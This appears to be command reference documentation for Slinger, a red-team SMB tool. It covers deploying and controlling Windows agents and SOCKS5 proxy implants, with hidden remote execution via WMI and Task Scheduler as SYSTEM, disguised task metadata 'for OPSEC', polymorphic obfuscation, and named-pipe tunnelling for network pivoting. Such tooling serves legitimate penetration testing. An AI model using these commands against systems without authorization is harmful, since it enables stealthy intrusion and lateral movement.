FORWARD SECRECY: Each session gets a new random nonce and unique session key. Compromising one session does NOT affect past or future sessions. To refresh encryption keys, exit and reconnect for a new session.
INTERACTIVE SHELL COMMANDS:
help - Show available commands
exit/quit - Close session and disconnect from agent
Help:
usage: agent use [-h] [--timeout TIMEOUT] [--no-colors] agent_id
Connect to and interact with a deployed agent via named pipe.
ENCRYPTION & SESSION SECURITY:
Agents built with --pass use AES-256-GCM encryption with HMAC-SHA256
authentication. Each session uses unique encryption keys:
1. Agent generates random 16-byte nonce when you connect
2. Client proves knowledge of passphrase via HMAC-SHA256 challenge-response
3. Both derive session key using PBKDF2-HMAC-SHA256(passphrase_hash,
nonce, 10k iterations)
4. All commands in the session are encrypted with AES-256-GCM using this key
FORWARD SECRECY: Each session gets a new random nonce and unique session
key. Compromising one session does NOT affect past or future sessions.
To refresh encryption keys, exit and reconnect for a new session.
INTERACTIVE SHELL COMMANDS:
help - Show available commands
exit/quit - Close session and disconnect from agent
<command> - Execute any Windows command on the agent
Example Usage:
Example: agent use agent_12345 --no-colors
Arguments
agent_id: Agent ID to connect totimeout: Connection timeout in seconds (default: 30)- Default:
30 - Required: No
- Default:
agent start
Description: Start a stopped or crashed agent using its deployment information
Help:
usage: agent start [-h] [--method {wmiexec,atexec}] [--sp PATH] [--sn NAME]
[--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
agent_id
Start a stopped or crashed agent using its deployment information
Example Usage:
Examples:
agent start slinger_abc123 # Start using wmiexec (default)
agent start slinger_abc123 --method atexec # Start using Task Scheduler
agent start slinger_abc123 --method atexec --ta "SYSTEM" --td "Maintenance Task"
Execution details:
wmiexec - Win32_Process.Create with ShowWindow=0 (hidden window)
atexec - Task Scheduler with cmd.exe /C start /B (no new window)
Task runs as SYSTEM in session 0 (non-interactive)
Note: --ta, --td, --tf and other atexec options only apply with --method atexec.
They are ignored when using the default wmiexec method.
Both methods save output to a temp file on target and retrieve it via SMB.
--sp should be reachable from the connected share.
Arguments
agent_id: Agent ID to startmethod: Execution method to start agent (default: wmiexec)- Choices: wmiexec, atexec
- Default:
wmiexec
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share- Default:
\Users\Public\Downloads\
- Default:
sn: Filename for command output (default: random)tn: Scheduled task name (default: auto-generated)ta: Task author for OPSEC (default: Slinger)- Default:
Slinger
- Default:
td: Task description for OPSEC (default: Slinger Task)- Default:
Slinger Task
- Default:
tf: Task Scheduler folder (default: \Windows)- Default:
\Windows
- Default:
wait: Seconds to wait for task completion (default: 2)- Default:
2 - Required: No
- Default:
agent kill
Description: Find and terminate the agent process using taskkill via WMI or Task Scheduler
Help:
usage: agent kill [-h] [--method {wmiexec,atexec}] [--sp PATH] [--sn NAME]
[--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
agent_id
Find and terminate the agent process using taskkill via WMI or Task Scheduler
Example Usage:
Examples:
agent kill slinger_abc123 # Kill using wmiexec (default)
agent kill slinger_abc123 --method atexec # Kill using Task Scheduler
agent kill slinger_abc123 --method atexec -w 3 # Wait 3 seconds for task completion
agent kill slinger_abc123 --method atexec --ta "SYSTEM" --td "Maintenance Task"
Note: --ta, --td, --tf and other atexec options only apply with --method atexec.
They are ignored when using the default wmiexec method.
Both methods save output to a temp file on target and retrieve it via SMB.
--sp should be reachable from the connected share.
Arguments
agent_id: Agent ID to killmethod: Execution method for taskkill (default: wmiexec)- Choices: wmiexec, atexec
- Default:
wmiexec
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share- Default:
\Users\Public\Downloads\
- Default:
sn: Filename for command output (default: random)tn: Scheduled task name (default: auto-generated)ta: Task author for OPSEC (default: Slinger)- Default:
Slinger
- Default:
td: Task description for OPSEC (default: Slinger Task)- Default:
Slinger Task
- Default:
tf: Task Scheduler folder (default: \Windows)- Default:
\Windows
- Default:
wait: Seconds to wait for task completion (default: 2)- Default:
2 - Required: No
- Default:
agent rm
Description: Delete the agent executable file and update registry status
Help:
usage: agent rm [-h] agent_id
Delete the agent executable file and update registry status
Example Usage:
Example: agent rm slinger_abc123
Arguments
agent_id: Agent ID to remove- Required: Yes
agent reset
Description: Kill all running agent processes and delete all agent files
Help:
usage: agent reset [-h] [--method {wmiexec,atexec}] [--sp PATH] [--sn NAME]
[--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
Kill all running agent processes and delete all agent files
Example Usage:
Examples:
agent reset # Reset using wmiexec (default)
agent reset --method atexec # Reset using Task Scheduler
agent reset --method atexec -w 3 # Wait 3 seconds for task completion
Note: --ta, --td, --tf and other atexec options only apply with --method atexec.
They are ignored when using the default wmiexec method.
Both methods save output to a temp file on target and retrieve it via SMB.
--sp should be reachable from the connected share.
Arguments
method: Execution method for kill operations (default: wmiexec)- Choices: wmiexec, atexec
- Default:
wmiexec
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share- Default:
\Users\Public\Downloads\
- Default:
sn: Filename for command output (default: random)tn: Scheduled task name (default: auto-generated)ta: Task author for OPSEC (default: Slinger)- Default:
Slinger
- Default:
td: Task description for OPSEC (default: Slinger Task)- Default:
Slinger Task
- Default:
tf: Task Scheduler folder (default: \Windows)- Default:
\Windows
- Default:
wait: Seconds to wait for task completion (default: 2)- Default:
2 - Required: No
- Default:
agent update
Description: Update the agent's file path in the registry
Help:
usage: agent update [-h] --path PATH agent_id
Update the agent's file path in the registry
Example Usage:
Example: agent update slinger_abc123 --path c:\new\path\agent.exe
Arguments
agent_id: Agent ID to updatepath: New file path for the agent- Required: Yes
proxy
Description: Build, deploy, and connect to SOCKS5 proxy binaries that tunnel traffic through SMB named pipes. No new ports opened on target.
Help:
usage: proxy [-h] ACTION ...
Build, deploy, and connect to SOCKS5 proxy binaries that tunnel traffic through SMB named pipes. No new ports opened on target.
Example Usage:
Examples:
proxy build --arch x64 --pipe myproxy --pass s3cret # Build proxy binary
proxy deploy ./proxy.exe --name myproxy --start # Upload and start
proxy connect myproxy --port 1080 # Start local SOCKS5 listener
proxy stop myproxy # Kill proxy process
proxy rm myproxy # Delete proxy file
proxy list # List deployed proxies
Usage with proxychains:
1. proxy connect myproxy --port 1080
2. Edit /etc/proxychains.conf: socks5 127.0.0.1 1080
3. proxychains nmap -sT 10.10.10.0/24
Note: Proxy binary communicates over existing SMB connection (port 445).
No additional ports are opened on the target.
Subcommands
proxy build
Description: Cross-compile a SOCKS5 proxy binary for Windows targets. Uses the same polymorphic obfuscation as the agent build system.
Help:
usage: proxy build [-h] [--arch {x86,x64,both}] [--pipe PIPE]
[--pass PASSPHRASE] [--obfuscate] [--upx UPX]
[--name CUSTOM_NAME] [--debug] [--dry-run]
Cross-compile a SOCKS5 proxy binary for Windows targets. Uses the same polymorphic obfuscation as the agent build system.
Example Usage:
Examples:
proxy build --arch x64 # Basic x64 proxy
proxy build --arch x64 --pipe myproxy --pass s3cret # With auth
proxy build --arch x64 --obfuscate # Maximum obfuscation
proxy build --arch both --pipe tunnel # Build x86 + x64
Arguments
arch: Target architecture (default: x64)- Choices: x86, x64, both
- Default:
x64
pipe: Named pipe name on target (default: slingproxy)- Default:
slingproxy
- Default:
passphrase: Passphrase for encrypted pipe communicationupx: Path to UPX binary for compressioncustom_name: Custom output binary name- Required: No
proxy deploy
Description: Upload proxy binary to the remote target via SMB.
Help:
usage: proxy deploy [-h] --name NAME [--path PATH] [--start]
[--method {wmiexec,atexec}] [--pipe PIPE] [--sp PATH]
[--sn NAME] [--tn NAME] [--ta AUTHOR] [--td DESC]
[--tf FOLDER] [-w SECS]
proxy_file
Upload proxy binary to the remote target via SMB.
Example Usage:
Examples:
proxy deploy ./proxy.exe --name myproxy # Upload only
proxy deploy ./proxy.exe --name myproxy --start # Upload and start
proxy deploy ./proxy.exe --path "\Temp\" --name myproxy # Custom path
proxy deploy ./proxy.exe --name myproxy --start --method atexec # Start via Task Scheduler
Execution details (--start):
wmiexec - Win32_Process.Create with ShowWindow=0 (hidden window)
atexec - Task Scheduler with cmd.exe /C start /B (no new window)
Arguments
proxy_file: Path to proxy binary filename: Name for deployed proxy on targetpath: Remote directory to upload to (default: auto per share)method: Execution method to start proxy (default: wmiexec)- Choices: wmiexec, atexec
- Default:
wmiexec
pipe: Pipe name (must match build-time pipe name)sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share- Default:
\Users\Public\Downloads\
- Default:
sn: Filename for command output (default: random)tn: Scheduled task name (default: auto-generated)ta: Task author for OPSEC (default: Slinger)- Default:
Slinger
- Default:
td: Task description for OPSEC (default: Slinger Task)- Default:
Slinger Task
- Default:
tf: Task Scheduler folder (default: \Windows)- Default:
\Windows
- Default:
wait: Seconds to wait for task completion (default: 2)- Default:
2 - Required: No
- Default:
proxy connect
Description: Connect to a deployed proxy via named pipe and start a local SOCKS5 server for tunneling traffic.
Help:
usage: proxy connect [-h] [--pass PASSPHRASE] [--port PORT] [--bind BIND]
proxy_id
Connect to a deployed proxy via named pipe and start a local SOCKS5 server for tunneling traffic.
Example Usage:
Examples:
proxy connect myproxy # Default port 1080
proxy connect myproxy --port 9050 # Custom port
proxy connect myproxy --pass s3cret # Auth (must match build --pass)
proxy connect myproxy --bind 0.0.0.0 # Listen on all interfaces
Arguments
proxy_id: Proxy name or ID to connect topassphrase: Passphrase for authentication (must match build --pass)port: Local SOCKS5 port (default: 1080)- Default:
1080
- Default:
bind: Local bind address (default: 127.0.0.1)- Default:
127.0.0.1 - Required: No
- Default:
proxy use
Description: Return to the proxy interactive shell after using 'back'.
Help:
usage: proxy use [-h] proxy_id
Return to the proxy interactive shell after using 'back'.
Example Usage:
Examples:
proxy use myproxy # Re-enter proxy subshell
Arguments
proxy_id: Proxy name to re-enter- Required: Yes
proxy start
Description: Start a previously deployed proxy using its deployment information.
Help:
usage: proxy start [-h] [--method {wmiexec,atexec}] [--sp PATH] [--sn NAME]
[--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
proxy_id
Start a previously deployed proxy using its deployment information.
Example Usage:
Examples:
proxy start myproxy # Start using wmiexec (default)
proxy start myproxy --method atexec # Start using Task Scheduler
Execution details:
wmiexec - Win32_Process.Create with ShowWindow=0 (hidden window)
atexec - Task Scheduler with cmd.exe /C start /B (no new window)
Task runs as SYSTEM in session 0 (non-interactive)
Note: --ta, --td, --tf and other atexec options only apply with --method atexec.
They are ignored when using the default wmiexec method.
Arguments
proxy_id: Proxy name or ID to startmethod: Execution method to start proxy (default: wmiexec)- Choices: wmiexec, atexec
- Default:
wmiexec
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share- Default:
\Users\Public\Downloads\
- Default:
sn: Filename for command output (default: random)tn: Scheduled task name (default: auto-generated)ta: Task author for OPSEC (default: Slinger)- Default:
Slinger
- Default:
td: Task description for OPSEC (default: Slinger Task)- Default:
Slinger Task
- Default:
tf: Task Scheduler folder (default: \Windows)- Default:
\Windows
- Default:
wait: Seconds to wait for task completion (default: 2)- Default:
2 - Required: No
- Default:
proxy stop
Description: Kill the proxy process on the remote target using taskkill.
Help:
usage: proxy stop [-h] [--method {wmiexec,atexec}] [--sp PATH] [--sn NAME]
[--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
proxy_id
Kill the proxy process on the remote target using taskkill.
Example Usage:
Execution details:
wmiexec - taskkill /F /IM via Win32_Process.Create (ShowWindow=0)
atexec - taskkill /F /IM via Task Scheduler (cmd.exe /C start /B)
Arguments
proxy_id: Proxy name or ID to stopmethod: Execution method for taskkill (default: wmiexec)- Choices: wmiexec, atexec
- Default:
wmiexec
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share- Default:
\Users\Public\Downloads\
- Default:
sn: Filename for command output (default: random)tn: Scheduled task name (default: auto-generated)ta: Task author for OPSEC (default: Slinger)- Default:
Slinger
- Default:
td: Task description for OPSEC (default: Slinger Task)- Default:
Slinger Task
- Default:
tf: Task Scheduler folder (default: \Windows)- Default:
\Windows
- Default:
wait: Seconds to wait for task completion (default: 2)- Default:
2 - Required: No
- Default:
proxy rm
Description: Delete the proxy binary file from the remote target.
Help:
usage: proxy rm [-h] proxy_id
Delete the proxy binary file from the remote target.
Arguments
proxy_id: Proxy name or ID to remove- Required: Yes
proxy list
Description: Show all deployed proxies and their status.
Help:
usage: proxy list [-h] [-f {table,json}]
Show all deployed proxies and their status.
Arguments
format: Output format (default: table)- Choices: table, json
- Default:
table - Required: No